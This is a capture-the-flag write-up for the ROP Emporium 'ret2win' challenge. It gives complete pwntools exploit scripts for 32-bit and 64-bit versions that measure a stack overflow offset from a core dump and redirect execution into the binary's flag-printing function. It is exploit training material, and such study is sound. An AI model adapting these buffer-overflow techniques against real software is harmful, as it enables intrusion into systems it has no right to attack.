ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge. The binary contains an unused function, ret2win, in its .text segment that calls system("/bin/cat flag.txt") for us; such never-called code is sometimes referred to as "dead code".

Exploit

#!/usr/bin/env python3
"""ROP Emporium ret2win (32-bit) solution.

First measures the distance from the input buffer to the saved return
address using a crash core dump, then sends a payload that returns into the
binary's own ``ret2win`` function. The binary path below is relative, so the
script is expected to run from the challenge directory.
"""
from pwn import *  # also brings `os` and `log` into scope

#--------Setup--------#

context(arch="i386", os="linux")
# checksec=False only silences the mitigation summary printed on load.
elf = ELF("ret2win32", checksec=False)

#--------Offset--------#

# Crash a throwaway copy of the process with a de Bruijn pattern so the
# overwritten return address holds a recognisable 4-byte subsequence.
p = elf.process()
pattern = cyclic(1024)
# NOTE(review): recent pwntools versions expect bytes here (b"> ");
# confirm against the installed version.
p.sendlineafter("> ", pattern)
p.wait()  # wait for the child to exit (it should crash on the bad return address)
core = p.corefile  # parse the core dump produced by the crash
p.close()
os.remove(core.file.name)  # the core file is no longer needed once parsed
# On 32-bit the pattern bytes land directly in EIP.
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ret2text--------#

# Address of the unused ("dead") ret2win function already present in .text.
ret2win = elf.sym["ret2win"]

# Padding up to the saved return address, followed by the return target
# (flat() packs it to the width given by context.arch).
payload = flat(
    b"A" * offset,
    ret2win,
)

# Fresh process: the first one only served to measure the offset.
p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()

ret2win 64bit

Solution

The idea is essentially the same as the 32-bit case.

Exploit

#!/usr/bin/env python3
"""ROP Emporium ret2win (64-bit) solution.

Same approach as the 32-bit version: measure the return-address offset from
a crash core dump, then return into the binary's own ``ret2win`` function.
The binary path below is relative, so the script is expected to run from the
challenge directory.
"""
from pwn import *  # also brings `os` and `log` into scope

#--------Setup--------#

context(arch="amd64", os="linux")
# checksec=False only silences the mitigation summary printed on load.
elf = ELF("ret2win", checksec=False)

#--------Offset--------#

# Crash a throwaway copy of the process with a de Bruijn pattern so the
# overwritten return address holds a recognisable 4-byte subsequence.
p = elf.process()
pattern = cyclic(1024)
# NOTE(review): recent pwntools versions expect bytes here (b"> ");
# confirm against the installed version.
p.sendlineafter("> ", pattern)
p.wait()  # wait for the child to exit (it should crash on the bad return address)
core = p.corefile  # parse the core dump produced by the crash
p.close()
os.remove(core.file.name)  # the core file is no longer needed once parsed
# On amd64 the non-canonical pattern value is never loaded into RIP, so the
# pattern is read from where RSP points at the time of the crash instead;
# the first 4 bytes are enough for cyclic_find().
offset = cyclic_find(core.read(core.rsp, 4))

log.info(f"{offset = }")

#--------ret2text--------#

# Address of the unused ("dead") ret2win function already present in .text.
ret2win = elf.sym["ret2win"]

# Padding up to the saved return address, followed by the return target
# (flat() packs it to the width given by context.arch).
payload = flat(
    b"A" * offset,
    ret2win,
)

# Fresh process: the first one only served to measure the offset.
p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()
